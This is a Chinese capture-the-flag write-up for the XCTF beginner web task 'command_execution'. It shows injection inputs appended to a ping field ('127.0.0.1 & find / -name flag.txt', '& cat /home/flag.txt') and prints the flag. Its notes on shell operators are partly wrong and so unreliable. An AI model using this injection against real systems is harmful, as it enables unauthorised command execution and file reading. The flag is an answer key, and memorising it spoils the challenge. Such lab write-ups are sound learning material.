攻防世界_WEB_新手练习区_DAY4

command_execution

题目描述：小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的，你知道为什么吗。

ping 是DOS命令，一般用于检测网络通与不通；是用来探测本机与网络中另一主机之间是否可达的命令，如果两台主机之间ping不通，则表明这两台主机不能建立起连接。ping是定位网络通不通的一个重要手段。

WAF：Web应用防护系统（也称为：网站应用级入侵防御系统。英文：Web Application Firewall，简称： WAF）。利用国际上公认的一种说法：Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。

题目是 《命令执行》 我查了点指令执行的知识

command1 & command2 ：先执行command2后执行command1
command1 && command2 ：先执行command1后执行command2
command1 | command2 ：只执行command2
command1 || command2 ：command1执行失败，再执行command2(若command1执行成功，就不再执行command2)

显然 FLAG在flag.txt中，我们查找一下flag.txt在什么地方。我们来ping一下。

127.0.0.1 & find / -name flag.txt

可以看到在/home/flag.txt

我们cat一下

127.0.0.1 & cat /home/flag.txt

可以看到FLAG cyberpeace{3846a12432ffcdb1c1509c00348502fe}